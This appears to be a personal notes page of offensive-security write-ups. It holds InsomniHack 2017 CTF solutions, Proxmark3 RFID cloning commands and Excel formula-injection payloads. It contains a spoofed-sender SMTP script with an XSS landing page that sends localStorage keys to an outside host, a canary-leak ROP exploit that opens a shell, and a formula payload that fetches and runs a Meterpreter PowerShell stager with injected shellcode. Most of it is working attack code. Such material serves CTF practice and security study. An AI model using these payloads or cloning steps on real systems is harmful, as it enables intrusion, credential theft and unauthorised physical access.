# InsomniHack teaser 2k17: The Great Escape - part 2 - forensics - 200 pts


# ./certbot-auto

# cat phishing.py
from pwn import *

# Scripted SMTP submission to the challenge mail server. pwntools `remote`
# plays the client side of one SMTP session by hand: for every step the
# script waits for a fragment of the server's reply, then sends the next
# command. The session contains no STARTTLS and no AUTH step.
host = 'ssc.teaser.insomnihack.ch'
port = 25

r = remote(host, port)

# Greeting banner: only the '(Ubuntu)' fragment of it is waited for.
expect = '(Ubuntu)'
# EHLO with an internal-looking EC2 hostname (a plain string, not verified
# by anything in this exchange).
line = 'ehlo ip-172-31-36-141.eu-west-1.compute.internal'
r.sendlineafter(expect, line)
# Presumably the last line of the EHLO capability list.
expect = '250 SMTPUTF8'
# Envelope sender inside the recipient's own domain. From the defender's
# side this is the step that sender-domain policy (SPF/DKIM/DMARC) or a
# refusal of unauthenticated local-domain senders would catch.
line = 'mail FROM:<gr27@ssc.teaser.insomnihack.ch>'
r.sendlineafter(expect, line)
expect = 'Ok'
line = 'rcpt TO:<rogue@ssc.teaser.insomnihack.ch>'
r.sendlineafter(expect, line)
expect = 'Ok'
line = 'data'
r.sendlineafter(expect, line)
# Tail of the DATA prompt ("End data with <CR><LF>.<CR><LF>", presumably).
expect = '.<CR><LF>'
# The whole MIME message goes out as one block. The literal is not a raw
# string, so the final '\r\n' is a real CR LF after the lone '.' that ends
# DATA; sendlineafter appends one more newline after that. The message
# header From: repeats the envelope sender above, and the body carries the
# link to links.html (listed next).
line = '''Content-Type: multipart/mixed; boundary="===============5398474817237612449=="
MIME-Version: 1.0
From: gr27@ssc.teaser.insomnihack.ch
To: rogue@ssc.teaser.insomnihack.ch
Date: Fri, 20 Jan 2017 11:51:27 +0000
Subject: Good links

--===============5398474817237612449==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

Hello Rogue,

https://thegreatescape2.ddns.net/links.html

GR-27

--===============5398474817237612449==--
.\r\n'''
r.sendlineafter(expect, line)

# cat /var/www/html/links.html
<!-- Landing page linked from the e-mail above. It is a self-submitting form:
     once jQuery is ready, the visitor's browser POSTs a "login" request to
     the target's /api/user.php, carrying the visitor's own cookies. For the
     rest to work, user.php has to reflect the "name" field into a page on
     the ssc.teaser.insomnihack.ch origin unescaped - that is inferred from
     the /get.html access.log entry further down, not visible here. -->
<html>
     <form id="1234" action="https://ssc.teaser.insomnihack.ch/api/user.php" method="post">
          <input name="action" value="login" />
   <!-- The "name" value is an <img> whose onerror handler document.write()s
        a script. The String.fromCharCode(...) list decodes to:
          <script>var data = '';for (var key in localStorage){ data += localStorage.getItem(key)}
          var http = new XMLHttpRequest();
          http.open('GET', 'https://thegreatescape2.ddns.net/get.html?ls=' + data, true);http.send();</script>
        i.e. every localStorage value of the origin it runs on is concatenated
        and sent to thegreatescape2.ddns.net in the query string. The
        access.log line for /get.html below shows what arrived. -->
   <input name="name" value="<img src='a' onerror='javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,62,118,97,114,32,100,97,116,97,32,61,32,39,39,59,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,108,111,99,97,108,83,116,111,114,97,103,101,41,123,32,100,97,116,97,32,43,61,32,108,111,99,97,108,83,116,111,114,97,103,101,46,103,101,116,73,116,101,109,40,107,101,121,41,125,118,97,114,32,104,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,104,116,116,112,46,111,112,101,110,40,39,71,69,84,39,44,32,39,104,116,116,112,115,58,47,47,116,104,101,103,114,101,97,116,101,115,99,97,112,101,50,46,100,100,110,115,46,110,101,116,47,103,101,116,46,104,116,109,108,63,108,115,61,39,32,43,32,100,97,116,97,44,32,116,114,117,101,41,59,104,116,116,112,46,115,101,110,100,40,41,59,60,47,115,99,114,105,112,116,62))'/>"/>
         <input name="password" value="tge2"/>
        </form>
</html>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
  // Submit the form with no user interaction as soon as the DOM is ready.
  $(document).ready(function() {
       window.document.forms[0].submit();
         });
</script>

# python phishing.py
[+] Opening connection to ssc.teaser.insomnihack.ch on port 25: Done
[*] Closed connection to ssc.teaser.insomnihack.ch port 25

# tail -f /var/log/apache2/access.log
52.214.142.175 - - [29/Jan/2017:09:27:14 +0000] "GET /links.html HTTP/1.1" 200 4202 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"
52.214.142.175 - - [29/Jan/2017:09:27:15 +0000] "GET /get.html?ls=INS{IhideMyVulnsWithCrypto}{"alg":"RSA-OAEP-256","d":"CFSPW_AU_cK07bOtdnzbj5MgBqdweDY04Ku-mHSrAIbDv3J_lHH-jCPQb5U2JR4v08eMXlz3AassULQr60rskdwjdPN7Nen15yRcRTsaoSyRTd2qM8O_U-K6Gy7Lvg_ld2HOlHNBBy2k8g8cP7cpjyy7Ebsk5MUNy_udx9aMs7497RaIrCFnpT7RztudkYBo_2Oy5xm6BcsV9059HBhbKbUqq6Ui9_BZ3H7sdwTqlYx3afVV5AgE61eEdWK7vK_yI65Ru_5_fOBWik7xf7fwPjf7COp1HfTZiFbCIWTUaXVe6ThfMoTdwT1wQ0wwuFdtpGTkk8d4XwGtDa8-_XbmIQ","dp":"hapJ7dlVsPvF9no_s-Nfnpv2dZ5a5_C2AyPo_-_mVi4-1a7HTkW9SyGg1KextCPYRAwQZ1wU3bL6P_4TjkrYiAAl-8Iq6moUqWuRY7G8vo3N_P3aBwjgyNTzk3eHfnUFP4QgGOooT2ZwyuDTDSbwKOesnD13q4U_vjtjcZaFU70","dq":"Ts_hwWPsLOjp-yJg0wbQEONeqbvNPLCChb5QJItXvUaL2JcN9muozrN1GZqu383-h8gZ-VUm3-CFU7OWeGYLa0PZlq1uGNvsdffgdNL3MYZ2KwMhXkwXKf45ePhx_ydiblYhb44cFtm0ffXKSPlvbyzLHvJ2_o8ggok0Lzu-weE","e":"AQAB","ext":true,"key_ops":["decrypt"],"kty":"RSA","n":"qx_U0OgHUPC6n4RcE_q1ONcEgKp4tcbLWeUIfrlRAcX64alQSpddAv98CHo2ziSBgi7tS-HwUsVlH06Nxaa0tx3SdM0cz95IkvjB_kqdPnHEwyx8iz5Gh8ZHP32ZoETBs2PzxTIcEOekm1qQnA0MTdvAAO0xcvuvhRM2YycRYfN860NsBCRrF25lZn9DTGBDnisCm0-xvElxAZ8gObWeJ1SZRgFRJwI14d11oa922drFp0ux4MHscls2tEjPV7eXdivjGYI-uzVX61fjyUdGxFeb8CAjxrzOmw4f1Aac7kqXwmF-eMq3AMKm2tArrIIjT4t2q2mP1FXImrNQ_vinVQ","p":"29_YD0m-NFoUTmst33E4p2VBDlCeQ1MJdr_7tO4ERF8aww0e8hu3jRq5PMHCEc8G8gA4q2kuXylIpaB5mWzcQplDDMgIDGupEnL_J0ynMcg-HUld8NDaya7mQWtLHvSEAoB-2MymBTJYaTwsvAYtTI8ruaqhMo4-cKjs5zQfmj0","q":"xz2B2WzMdesiDK7dzorVdJlBgIShj2cMRGwhXcSiWfbY2M4Y3DB_m8p5tdEUIU6g0oWbSfmaYF_MsQxijXRxxe17nuYssns2ue4hYm2xH4mTY6voeNhbOeu7LtOXepUWxN-5520suTvL74Lx9xwWrdeTGIF1_zECqbWRuFieSvk","qi":"VhY5UYLTv20Btpq4MlizFPSuuItbfmK61P0rqEXe-sYHTitMNDBOWDSwIqj4pHkDTFaOCG0o6z81MyVg_bmz2ODzkHDrJUeiOVSMISxlaeSRf2JhiVYMfXiWKJBGCP-PgWuHp5NwLwESZT3aZ0KBYSkE7jnfcttWbc0mYu1glWg"}{"alg":"RSA-OAEP-256","e":"AQAB","ext":true,"key_ops":["encrypt"],"kty":"RSA","n":"qx_U0OgHUPC6n4RcE_q1ONcEgKp4tcbLWeUIfrlRAcX64alQSpddAv98CHo2ziSBgi7tS-HwUsVlH06Nxaa0tx3SdM0cz95IkvjB_kqdPnHEwyx8iz5Gh8ZHP32ZoETBs2PzxTIcEOekm1qQnA0MTdvAAO0
xcvuvhRM2YycRYfN860NsBCRrF25lZn9DTGBDnisCm0-xvElxAZ8gObWeJ1SZRgFRJwI14d11oa922drFp0ux4MHscls2tEjPV7eXdivjGYI-uzVX61fjyUdGxFeb8CAjxrzOmw4f1Aac7kqXwmF-eMq3AMKm2tArrIIjT4t2q2mP1FXImrNQ_vinVQ"}nullnullnullnullnullnull HTTP/1.1" 404 3761 "https://ssc.teaser.insomnihack.ch/api/user.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"

# InsomniHack teaser 2k17: The Great Escape - part 1 - forensics - 50 pts


Initial wireshark filters

smtp

Hello GR-27,

I'm currently planning my escape from this confined environment. I plan on using our Swiss Secure Cloud (https://ssc.teaser.insomniha.

I'll be checking this mail box every now and then if you have any information for me. I'm always interested in learning, so if you ha.

Rogue


ftp-data
-----BEGIN PRIVATE KEY-----
MIIJQwIBADANBgkqhkiG9w0BAQEFAASCCS0wggkpAgEAAoICAQC5twyPH+2U6X0Q
uxOKPTHSR6MkXGSvAz+Ax+G9DKEiBLuTTfl7dNv4oswdmT9nWlSY1kxZatNwlUF8
...

edWr4Hzbiph0V1Dv/V+kmmreWBmHetH6bhrTWQq3UZ5WbGMpiTmSsD0EXU5vZLbX
xmZSEXjNvG9grjxwR96vp1PK/4Bq1jo=
-----END PRIVATE KEY-----

Decrypt HTTPS traffic

Preferences/Protocols/SSL/RSA keys list/Edit: 52.214.142.175 443 http rsaprivate.key

New wireshark filters

ip.addr == 52.214.142.175 and http and tcp.stream eq 76

  // Fetch one stored file by id, decrypt it in the browser and trigger a download.
  // Format as used here: the server returns {name, content}; content is a JSON
  // string {sessionkey, iv, file} (the same object submitForm builds). The
  // session key is RSA-OAEP-encrypted under this user's public key, the file
  // is AES-CBC encrypted under that session key.
  $scope.downloadFile = function(id) {
    console.log("Download file " + id);
    // withCredentials: the session cookie is sent along with the API call.
    $http.get("https://ssc.teaser.insomnihack.ch/api/files.php?action=download&id="+id,{withCredentials: true}).then(function(response) {
      var name = response.data.name;
      var content = JSON.parse(response.data.content);
      // Keys.getPrivKey() is not shown; generateKeys below stores the private
      // JWK in localStorage, so presumably it is read back from there.
      var key = Keys.getPrivKey();
      // 1. Recover the raw AES session key with the RSA private key.
      crypto.subtle.decrypt({name:"RSA-OAEP"},key,$scope._Base64ToArrayBuffer(content.sessionkey)).then(function(sesskey) {
        
        // 2. Turn the raw bytes into an AES-CBC CryptoKey.
        crypto.subtle.importKey('raw', sesskey, {name:"AES-CBC"},true,['encrypt','decrypt']).then(function(realsesskey) {
          // Logs the CryptoKey object, not the key bytes.
          console.log("Session key:" + realsesskey);
          // 3. Decrypt the file. AES-CBC provides confidentiality only: there is
          // no MAC/tag anywhere in {sessionkey, iv, file}, so a modified
          // ciphertext cannot be detected at this point.
          window.crypto.subtle.decrypt({name: "AES-CBC", iv: $scope._Base64ToArrayBuffer(content.iv)}, realsesskey, $scope._Base64ToArrayBuffer(content.file)).then(function(dec) {
            console.log(dec);
            // 4. Hand the plaintext to the browser as a download, named after
            //    the server-supplied name.
            var blob = new Blob([dec], {type: 'application/octet-stream'});
            var url = window.URL.createObjectURL(blob);
            var anchor = document.createElement("a");
            anchor.download = name;
            anchor.href = url;
            anchor.click();
            window.URL.revokeObjectURL(url);
            anchor.remove();
          // Every rejection handler in this chain only logs to the console;
          // the user gets no visible error.
          },function(e){console.log(e);});
        },function(e){console.log(e);});
        
      },function(response){console.log(response);});
    }, function(response){console.log(response);});
  }

  // Encrypt the selected file in the browser and upload it.
  // Hybrid scheme: a fresh 128-bit AES-CBC key and a random 16-byte IV for
  // the file, the raw AES key RSA-OAEP-encrypted under this user's public
  // key. The file *name* travels in the clear as the `name=` form field
  // (compare the captured POST further down, which ends in `&name=rogue`).
  // NOTE: this listing stops at the end of the generateKey().then() chain;
  // the statement that starts the FileReader (presumably readAsArrayBuffer,
  // since e.target.result is passed straight to subtle.encrypt) and the
  // closing braces of onload and submitForm are not part of the excerpt.
  $scope.submitForm = function() {
    var file = document.getElementById('uploadFile').files[0];
    var reader = new FileReader();
    var pubKey = Keys.getPubKey();
    reader.onload = function(e) {
      var cleartext = e.target.result;
      window.crypto.subtle.generateKey(
          {name: "AES-CBC", length: 128}, 
          true, 
          ["encrypt", "decrypt"]).then(function(key) {
            var iv = window.crypto.getRandomValues(new Uint8Array(16));
            var sessionkey = key;
            window.crypto.subtle.encrypt({name: "AES-CBC", iv: iv}, key, cleartext).then(function(enc) {
              console.log(enc);
              var encfile = enc;
              // Logs the CryptoKey object, not the key material.
              console.log("sesskey : " + sessionkey);
              // The AES key was generated extractable (true above), which is
              // what allows the raw export here.
              crypto.subtle.exportKey('raw', sessionkey).then(function(exportedKey){
                crypto.subtle.encrypt({name:"RSA-OAEP"},pubKey,exportedKey).then(function(encrypted) {
                  // JSON-encoded, this is the object downloadFile later parses
                  // out of response.data.content.
                  var res = {sessionkey: $scope._arrayBufferToBase64(encrypted), iv: $scope._arrayBufferToBase64(iv), file: $scope._arrayBufferToBase64(encfile)};

                  //console.log(JSON.stringify(res));
                  $http({
                    method: 'POST',
                    url: "https://ssc.teaser.insomnihack.ch/api/files.php",
                    data: "action=upload&file="+encodeURIComponent(JSON.stringify(res))+"&name="+encodeURIComponent(file.name),
                    headers : {'Content-Type': 'application/x-www-form-urlencoded'},
                    withCredentials: true,
                  }).then(function(response) {
                    if(response.data.status == 'SUCCESS') {
                      $scope.getFiles();
                    }
                  }, function(response) {console.log(response);});
                // The exportKey and RSA encrypt promises have no rejection
                // handler, so a failure there is silent.
                });
              });
              
            }
          );
          });
        
    
    // Generate the user's RSA-OAEP key pair in the browser and persist both
    // halves as JWK in localStorage ("publicKey" / "privateKey").
    // Review note: extractable:true together with localStorage means the
    // private key (JWK with d/p/q) is readable by any script running on this
    // origin - the /get.html access.log entry earlier on this page is exactly
    // that JWK leaving in a query string. A non-extractable CryptoKey kept in
    // IndexedDB would still be usable for decrypt but not exportable by script.
    // NOTE: the excerpt ends after .catch(); the closing brace of generateKeys
    // is not shown.
    $scope.generateKeys = function() {
      console.log("Generating keys");
      window.crypto.subtle.generateKey({
              name: "RSA-OAEP",
              modulusLength: 2048, //can be 1024, 2048, or 4096
              publicExponent: new Uint8Array([0x01, 0x00, 0x01]),
              hash: {name: "SHA-256"}, //can be "SHA-1", "SHA-256", "SHA-384", or "SHA-512"
          },
          true, //whether the key is extractable (i.e. can be used in exportKey)
          ["encrypt", "decrypt"] //must be ["encrypt", "decrypt"] or ["wrapKey", "unwrapKey"]
      )
      .then(function(key){
          // Neither exportKey promise is returned from this handler, so the
          // chain settles before the keys are stored and .catch() below never
          // sees an export failure. The inner `key` parameters shadow the key pair.
          window.crypto.subtle.exportKey("jwk",key.publicKey).then(function(key) {
            localStorage.setItem("publicKey",JSON.stringify(key));
          });
          window.crypto.subtle.exportKey("jwk",key.privateKey).then(function(key) {
            localStorage.setItem("privateKey",JSON.stringify(key));
          });
          
      })
      .catch(function(err){
          console.error(err);
      });


ip.addr == 52.214.142.175 and http and tcp.stream eq 85

POST /api/files.php HTTP/1.1
Host: ssc.teaser.insomnihack.ch
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Referer: https://ssc.teaser.insomnihack.ch/files
Content-Length: 20877
Cookie: PHPSESSID=3u5dqmfudc7ap1di0nmfjgtjm3
FLAG: INS{OkThatWasWay2Easy}
Connection: keep-alive

action=upload&file={
"sessionkey":"FDtHceahcvssOYVXpOBBdOqi5ZRCKqQI0wAg9kLZYPeG2tWeQw5GTTciwOu4AvTTfmt6S7RHtzhUuro0vFAfbeoKm/Uu3aoXY2XgBsgzcskszOzEKBD62k5yUGNHsFA1zGv8SsE8ERLD3C+O1WY24lpPgA9Me7p3wM5msnTrIS0OUFVEhAYytoqkKsvP+OgNs+o3Ch/FJZHam9V4eE6PU/1G3HhbIesIO9a5hFHHTUPLY/n6boZyS3I262zlGVOPd0R5dPg30J83nxixE1hedIkDQlNpLUNGBMa/vMsM0ViTh2AaLSmJZdPqOGlWn3PRAMnhgKk+fhROGsPHfpIq5w==",
"iv":"WSjrrrgGlOKiWKsWA5twjA==",
"file":"qkOqULxFivAN3uOwax9iCPZSrBcNtk172Rcfe7iDu...k0TUlSPBO"}&name=rogue

# InsomniHack teaser 2k17: baby - pwn - 50 pts


Binary info

# file baby
baby: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, not stripped
# ./checksec.sh --file baby
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   baby
# ./checksec.sh --file libc.so
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   Canary found      NX enabled    DSO             No RPATH   No RUNPATH   libc.so

Partial RELRO and Full RELRO

+ PLT --> GOT
resolved symbol: GOT entry --> address in the shared library
unresolved symbol: GOT entry --> back into the PLT --> dynamic linker (lazy binding)

+ Partial RELRO (Relocation Read Only)

- read-only after dynamic loader initialization: .init_array, .fini_array, .jcr, .dynamic, .got
- read-only: .got
- writeable: .got.plt

+ Full RELRO

- everything Partial RELRO gives, plus:
- lazy binding disabled: imported symbols are resolved at startup time.
- read-only: .got, .got.plt


Stop gdb from passing SIGALRM to the program

(gdb) info signals SIGALRM
Signal        Stop Print Pass to program Description
SIGALRM       No No Yes  Alarm clock
(gdb) handle SIGALRM nopass
Signal        Stop Print Pass to program Description
SIGALRM       No No No  Alarm clock

__libc_start_main address range

(gdb) disassemble __libc_start_main
0x00007ffff7a5c1c0
0x00007ffff7a5c385

Find a libc address (a return address into __libc_start_main)

Your format > %158$llp
0x7ffff7a5c2b1

(gdb) x/3i 0x7ffff7a5c2b1
   0x7ffff7a5c2b1 <__libc_start_main+241>: mov    edi,eax
   0x7ffff7a5c2b3 <__libc_start_main+243>: call   0x7ffff7a71960 <__GI_exit>
   0x7ffff7a5c2b8 <__libc_start_main+248>: xor    eax,eax

Find the libc base address: the leaked value is __libc_start_main+241, and the same `mov edi,eax` sits at offset 0x20830 in libc.so, so base = leak - 0x20830

# objdump -M intel -d libc.so | grep -A 2 'mov    edi,eax'
   20830: 89 c7                 mov    edi,eax
   20832: e8 f9 97 01 00        call   3a030 <exit@@GLIBC_2.2.5>
   20837: 31 d2                 xor    edx,edx

Find the stack cookie (canary) value

Your format > %138$llp
0x3277851dfc60e000

gdb config file

# cat .gdbinit
set follow-fork-mode child
handle SIGALRM nopass
set environment LD_PRELOAD=./libc.so
set disassembly-flavor intel

Exploit

# cat baby.py
from pwn import *

host = 'baby.teaser.insomnihack.ch' # '127.0.0.1' when running against the local copy (see the .gdbinit above)
port = 1337

def leak_address(pos):
    """Go through menu option 2 once and return the line the program prints.

    `pos` is the format string handed to the "Your format > " prompt (for
    example '%138$llp', see the gdb notes above); the program prints the
    stack word that directive selects. The return value is the raw line,
    newline included - callers parse it with int(..., 16). Uses the
    module-level connection `r`.
    """
    r.sendlineafter('> ', '2')
    r.sendlineafter('> ', pos)
    address = r.recvline()
    # Answer the following prompt with an empty line, presumably to get back
    # to the main menu - TODO confirm against the binary.
    r.sendlineafter('> ', '')
    return address

def give_me_a_shell(payload):
    """Send `payload` through menu option 1 and switch to interactive mode.

    The '? ' prompt is answered with len(payload) + 1; the extra byte
    presumably covers the newline that sendline appends - confirm against
    the binary. Uses the module-level connection `r`; never returns
    normally because r.interactive() takes over the session.
    """
    r.sendlineafter('> ', '1')
    r.sendlineafter('? ', str(len(payload) + 1))
    r.sendline(payload)
    r.interactive()

context.clear()
context.arch = 'amd64'
print '[+] Arch = ' + context.arch

r = remote(host, port)

# Two reads through the format string: stack offset 138 holds the canary
# (low byte 00 in the gdb transcript above) and 158 holds a return address
# inside __libc_start_main (+241).
cookie = int(leak_address('%138$llp'), 16)
libc = int(leak_address('%158$llp'), 16)

# 0x20830 is the file offset of that same instruction in libc.so (objdump
# above), so subtracting it gives the library's load base.
elf = ELF('libc.so')
elf.address = libc - 0x20830
print '[+] libc base = ' + hex(elf.address)

# Stack layout assumed here: 1032 bytes up to the canary, the canary itself,
# the saved rbp (its value does not matter to the chain, so the canary bytes
# are reused), then the return address where the chain starts.
padding = '\x90' * 1032
cookie = p64(cookie)
rbp = cookie
# Same chain as in the `rop.dump()` output below: dup2 fd 4 (presumably the
# accepted client socket, given follow-fork-mode child in .gdbinit) over
# stdin/stdout/stderr, then system("/bin/sh").
rop = ROP(elf)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.dup2(4, 2)
# .next() on the search generator is the Python 2 API, consistent with the
# print statements in this file.
rop.system(elf.search('/bin/sh\x00').next())
print '[+] rop\n' + rop.dump()

payload = padding + cookie + rbp + rop.chain()
give_me_a_shell(payload)

# python baby.py
[+] Arch = amd64
[+] Opening connection to baby.teaser.insomnihack.ch on port 1337: Done
[*] 'libc.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] libc base = 0x7f129d29e000
[*] Loaded cached gadgets for 'libc.so'
[+] rop
0x0000:   0x7f129d2bf102 pop rdi; ret
0x0008:              0x4
0x0010:   0x7f129d2be2e8 pop rsi; ret
0x0018:              0x0
0x0020:   0x7f129d394d90 dup2
0x0028:   0x7f129d29e937 <adjust: ret>
0x0030:   0x7f129d2bf102 pop rdi; ret
0x0038:              0x4
0x0040:   0x7f129d2be2e8 pop rsi; ret
0x0048:              0x1
0x0050:   0x7f129d394d90 dup2
0x0058:   0x7f129d29e937 <adjust: ret>
0x0060:   0x7f129d2bf102 pop rdi; ret
0x0068:              0x4
0x0070:   0x7f129d2be2e8 pop rsi; ret
0x0078:              0x2
0x0080:   0x7f129d394d90 dup2
0x0088:   0x7f129d29e937 <adjust: ret>
0x0090:   0x7f129d2bf102 pop rdi; ret
0x0098:   0x7f129d42a177
0x00a0:   0x7f129d2e3390 system
0x00a8:       'raabsaab' <pad>
[*] Switching to interactive mode
Good luck !
$ cat flag
INS{if_you_haven't_solve_it_with_the_heap_overflow_you're_a_baby!}

# RFID cracking


EM

# Cloning EM410x
proxmark3> lf read
proxmark3> data samples 30000
proxmark3> lf em4x em410xread
EM TAG ID      : 0DEADBEEF0
proxmark3> lf em4x em410xsim 0DEADBEEF0
proxmark3> lf em4x em410xwrite 0DEADBEEF0 1

# Bruteforcing UID - https://github.com/mtongsang/pm3Bruter
$ ./proxmark3 /dev/cu.usbmodem1411 -b -m 3 -c 256 -t 1122334455

Mifare classic 1k

# Key A for sector 0
proxmark3> hf mf mifare
Found valid key: a0a1a2a3a4a

# Keys A/B for all sectors
proxmark3> hf mf nested 1 0 A a0a1a2a3a4a5 d

# Dumping and reading stored data
proxmark3> hf mf dump
proxmark3> script run htmldump
$ xxd dumpkeys.bin
$ xxd dumpdata.bin

# Reading and writing blocks and sectors
proxmark3> hf mf rdbl 0 A a0a1a2a3a4a5
proxmark3> hf mf rdsc 0 A a0a1a2a3a4a5
proxmark3> hf mf wrbl 0 A a0a1a2a3a4a5
0300e5c81c0eec00000000004d494300

# Cloning a dumped tag (dumpdata.bin) using a magic Chinese card
proxmark3> hf mf csetuid 86bcfe41
proxmark3> hf mf restore

# Simulating a tag
proxmark3> hf 14a reader
 UID : 11 22 33 44
ATQA : 00 04
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proxmark3> hf 14a sim 1 11223344

Pyramid

# Cloning: read raw data
proxmark3> lf search
Pyramid ID Found - BitLength: 90 -unknown BitLength- (ABCDE), Raw: 11111111222222223333333344444444                                                         
Checksum XX passed
Valid Pyramid ID Found!

# Cloning: write raw data
proxmark3> lf t55xx write b 0 d 00107080
Writing page 0  block: 00  data: 0x00107080
proxmark3> lf t55xx write b 1 d 11111111
Writing page 0  block: 01  data: 0x11111111
proxmark3> lf t55xx write b 2 d 22222222
Writing page 0  block: 02  data: 0x22222222
proxmark3> lf t55xx write b 3 d 33333333
Writing page 0  block: 03  data: 0x33333333
proxmark3> lf t55xx write b 4 d 44444444
Writing page 0  block: 04  data: 0x44444444

# Excel formula injection


# cat payloads.txt
=cmd|'/C calc.exe'!Z
=cmd|'/C "%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe iex (new-object net.webclient).downloadstring(\"http://192.168.1.1/meterpreter.ps\")"'!Z

# cat meterpreter.ps
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');
$e=ps explorer;
$p=$e.id;
invoke-shellcode -shellcode
# msfvenom --platform windows --payload 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x48,0x31,0xc0,0x50,0x50,0x49,0xbc,0x02,0x00,0x04,0xd2,0x00,0x00,0x00,0x00,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x02,0x59,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0xc2,0xdb,0x37,0x67,0xff,0xd5,0x48,0x31,0xd2,0x48,0x89,0xf9,0x41,0xba,0xb7,0xe9,0x38,0xff,0xff,0xd5,0x4d,0x31,0xc0,0x48,0x31,0xd2,0x48,0x89,0xf9,0x41,0xba,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x48,0x89,0xf9,0x48,0x89,0xc7,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x48,0x81,0xc4,0xb0,0x02,0x00,0x00,0x48,0x83,0xec,
0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,0xe7,0x58 -force -processid $p

Reference

https://appsec-labs.com/portal/formula-injection/

Thanks

ams